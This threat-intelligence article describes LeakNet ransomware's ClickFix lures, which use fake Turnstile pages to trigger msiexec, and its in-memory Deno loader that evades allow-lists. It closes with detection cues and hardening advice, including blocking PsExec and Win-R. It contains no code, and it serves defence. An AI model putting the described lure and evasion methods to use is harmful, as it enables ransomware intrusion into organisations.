LeakNet Boosts Ransomware with ClickFix Lures, Stealthy Deno Loader

The ransomware landscape is witnessing a shift from broker‑mediated initial access toward self‑served, mass‑market infection vectors. LeakNet’s ClickFix lures exploit the trust users place in familiar web interfaces, such as fake Cloudflare Turnstile pages, to deliver an msiexec command that initiates the payload. This approach eliminates the need for costly credential purchases and expands the attack surface to any employee browsing the internet, dramatically increasing the odds of a successful compromise.

At the core of LeakNet’s new methodology is a Deno‑based loader that follows a bring‑your‑own‑runtime pattern. By executing a base64‑encoded JavaScript payload via a data: URL, the loader operates almost exclusively in memory, leaving negligible disk artifacts. Because Deno is a signed, widely‑used runtime, it can slip past naïve allow‑list policies; the malicious context—unusual command‑line arguments, execution outside development environments, and persistent outbound traffic—becomes the primary detection cue. This memory‑only execution model mirrors trends seen in other advanced threat groups that favor in‑memory techniques to outpace traditional antivirus solutions.

For defenders, the convergence of trusted binaries, cloud services, and compromised web assets demands a move toward behavioral analytics. Monitoring for msiexec invocations originating from browsers or Win‑R dialogs, flagging Deno processes that handle base64 data URLs, and detecting DLL sideloading in unexpected directories can surface early indicators. Coupled with strict user privileges—blocking PsExec and Win‑R for non‑administrators—and automated response playbooks, organizations can reduce the window of exposure. LeakNet’s tactics underscore the necessity of holistic, context‑aware security postures in an era where ransomware operators increasingly blend legitimate tools with custom code.